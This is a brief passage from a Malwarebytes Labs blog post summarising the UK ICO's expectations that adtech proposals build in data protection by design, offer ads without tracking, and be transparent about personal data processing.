The ICO says it expects any proposal to:

  • Engineer data protection requirements by default into the design of the initiative.
  • Offer users the choice of receiving adverts without tracking, profiling or targeting based on personal data.
  • Be transparent about how and why personal data is processed, and who is responsible for that processing.
  • Articulate the specific purposes for processing personal data
  • …and demonstrate how this is fair, lawful and transparent.
  • Address existing privacy risks and mitigate any new privacy risks that their proposal introduces.

As the ICO does, we are looking forward to more privacy focused ways of delivering targeted advertising.

The post ICO challenges adtech to step up privacy protection appeared first on Malwarebytes Labs.